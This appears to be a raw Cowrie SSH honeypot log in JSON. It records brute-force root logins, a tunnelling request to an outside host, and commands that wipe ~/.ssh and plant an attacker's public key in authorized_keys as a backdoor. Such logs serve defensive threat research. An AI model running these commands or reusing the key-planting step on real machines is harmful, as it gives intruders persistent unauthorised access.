{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":55022,"dst_ip":"1.2.3.4","dst_port":22,"session":"09bf70f24538","protocol":"ssh","message":"New connection: 27.112.78.245:55022 (1.2.3.4:22) [session: 09bf70f24538]","sensor":"my-vps","timestamp":"2025-08-26T00:00:24.020704Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:00:24.029006Z","src_ip":"27.112.78.245","session":"09bf70f24538"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:00:24.288135Z","src_ip":"27.112.78.245","session":"09bf70f24538"}
{"eventid":"cowrie.login.success","username":"root","password":"root@123456!","message":"login attempt [root/root@123456!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:00:25.382478Z","src_ip":"27.112.78.245","session":"09bf70f24538"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:00:25.927670Z","src_ip":"27.112.78.245","session":"09bf70f24538"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:00:25.928568Z","src_ip":"27.112.78.245","session":"09bf70f24538"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:00:25.929795Z","src_ip":"27.112.78.245","session":"09bf70f24538"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:00:26.190120Z","src_ip":"27.112.78.245","session":"09bf70f24538"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:00:26.818145Z","src_ip":"27.112.78.245","session":"09bf70f24538"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:00:26.818939Z","src_ip":"27.112.78.245","session":"09bf70f24538"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:00:27.086005Z","src_ip":"27.112.78.245","session":"09bf70f24538"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:00:27.087043Z","src_ip":"27.112.78.245","session":"09bf70f24538"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":55032,"dst_ip":"1.2.3.4","dst_port":22,"session":"e87e4694f44e","protocol":"ssh","message":"New connection: 27.112.78.245:55032 (1.2.3.4:22) [session: e87e4694f44e]","sensor":"my-vps","timestamp":"2025-08-26T00:00:27.345577Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:00:27.346237Z","src_ip":"27.112.78.245","session":"e87e4694f44e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:00:27.604794Z","src_ip":"27.112.78.245","session":"e87e4694f44e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:00:28.683603Z","src_ip":"27.112.78.245","session":"e87e4694f44e"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:00:29.944663Z","src_ip":"27.112.78.245","session":"e87e4694f44e"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":55042,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4d5ed30e09b","protocol":"ssh","message":"New connection: 27.112.78.245:55042 (1.2.3.4:22) [session: e4d5ed30e09b]","sensor":"my-vps","timestamp":"2025-08-26T00:00:30.216294Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:00:30.217438Z","src_ip":"27.112.78.245","session":"e4d5ed30e09b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:00:30.487092Z","src_ip":"27.112.78.245","session":"e4d5ed30e09b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:00:31.610622Z","src_ip":"27.112.78.245","session":"e4d5ed30e09b"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:00:31.879953Z","src_ip":"27.112.78.245","session":"09bf70f24538"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:00:31.881905Z","src_ip":"27.112.78.245","session":"e4d5ed30e09b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":61240,"dst_ip":"1.2.3.4","dst_port":22,"session":"04498b85f84b","protocol":"ssh","message":"New connection: 212.227.235.229:61240 (1.2.3.4:22) [session: 04498b85f84b]","sensor":"my-vps","timestamp":"2025-08-26T00:00:53.228178Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:00:53.229546Z","src_ip":"212.227.235.229","session":"04498b85f84b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":61617,"dst_ip":"1.2.3.4","dst_port":22,"session":"44cc631a1560","protocol":"ssh","message":"New connection: 212.227.235.229:61617 (1.2.3.4:22) [session: 44cc631a1560]","sensor":"my-vps","timestamp":"2025-08-26T00:00:53.331805Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:00:53.332861Z","src_ip":"212.227.235.229","session":"44cc631a1560"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T00:00:53.464778Z","src_ip":"212.227.235.229","session":"44cc631a1560"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:00:53.864700Z","src_ip":"212.227.235.229","session":"44cc631a1560"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T00:00:53.997120Z","session":"44cc631a1560"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51628,"dst_ip":"1.2.3.4","dst_port":22,"session":"f714c1f2d85b","protocol":"ssh","message":"New connection: 212.227.235.229:51628 (1.2.3.4:22) [session: f714c1f2d85b]","sensor":"my-vps","timestamp":"2025-08-26T00:01:16.908604Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:01:17.492614Z","src_ip":"212.227.235.229","session":"f714c1f2d85b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T00:01:17.493437Z","src_ip":"212.227.235.229","session":"f714c1f2d85b"}
{"eventid":"cowrie.login.success","username":"root","password":"Jairam@123","message":"login attempt [root/Jairam@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:01:20.445795Z","src_ip":"212.227.235.229","session":"f714c1f2d85b"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:01:21.052242Z","src_ip":"212.227.235.229","session":"f714c1f2d85b"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":36136,"dst_ip":"1.2.3.4","dst_port":22,"session":"c08f9bb11a18","protocol":"ssh","message":"New connection: 27.112.78.245:36136 (1.2.3.4:22) [session: c08f9bb11a18]","sensor":"my-vps","timestamp":"2025-08-26T00:01:52.845677Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:01:52.850628Z","src_ip":"27.112.78.245","session":"c08f9bb11a18"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:01:53.117043Z","src_ip":"27.112.78.245","session":"c08f9bb11a18"}
{"eventid":"cowrie.login.success","username":"root","password":"Ch@123456","message":"login attempt [root/Ch@123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:01:54.186177Z","src_ip":"27.112.78.245","session":"c08f9bb11a18"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:01:54.792248Z","src_ip":"27.112.78.245","session":"c08f9bb11a18"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:01:54.792984Z","src_ip":"27.112.78.245","session":"c08f9bb11a18"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:01:54.794291Z","src_ip":"27.112.78.245","session":"c08f9bb11a18"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:01:55.063036Z","src_ip":"27.112.78.245","session":"c08f9bb11a18"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:01:55.615427Z","src_ip":"27.112.78.245","session":"c08f9bb11a18"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:01:55.616090Z","src_ip":"27.112.78.245","session":"c08f9bb11a18"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:01:55.885611Z","src_ip":"27.112.78.245","session":"c08f9bb11a18"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:01:55.886504Z","src_ip":"27.112.78.245","session":"c08f9bb11a18"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":49644,"dst_ip":"1.2.3.4","dst_port":22,"session":"22e70a7b553b","protocol":"ssh","message":"New connection: 27.112.78.245:49644 (1.2.3.4:22) [session: 22e70a7b553b]","sensor":"my-vps","timestamp":"2025-08-26T00:01:56.159328Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:01:56.160059Z","src_ip":"27.112.78.245","session":"22e70a7b553b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:01:56.429658Z","src_ip":"27.112.78.245","session":"22e70a7b553b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:01:57.549984Z","src_ip":"27.112.78.245","session":"22e70a7b553b"}
